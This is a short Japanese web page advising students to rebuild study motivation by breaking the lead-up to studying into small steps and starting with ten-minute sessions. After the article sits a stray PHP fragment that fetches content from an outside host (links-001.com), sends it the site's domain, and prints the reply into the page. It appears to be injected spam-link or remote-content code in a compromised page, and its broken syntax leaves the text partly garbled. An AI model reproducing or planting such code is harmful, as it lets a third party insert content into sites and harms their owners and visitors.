前へ
次へ

勉強のモチベーションを回復させる方法

テスト前などに勉強をしようと思ってもなかなか勉強をする気が起こらず、結局最後まで勉強をしなかったという経験はないでしょうか。勉強をやらなければとは思っていても勉強をすることができないという人におすすめの方法が勉強をするまでの行動を細かく分ける方法です。例えば、まずは机の前に座る、座った後に机の上に筆記用具を用意する、用意が終わったら教科書とノートをカバンから取り出すといったように勉強するまでの行動を分けて実行することにより、勉強をすることに対して感じている面倒臭さなどを軽減することができます。また、一つ一つの行動のハードルが下がる為、行動を起こしやすい心理状態になります。勉強を始める際にも何時間以上やらなければならないといった制限を掛けるのではなく、最初は10分間だけ教科書を読む、といったような行いやすいものにすることにより、それから先の勉強に対するモチベーションを下げないようにすることができます。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top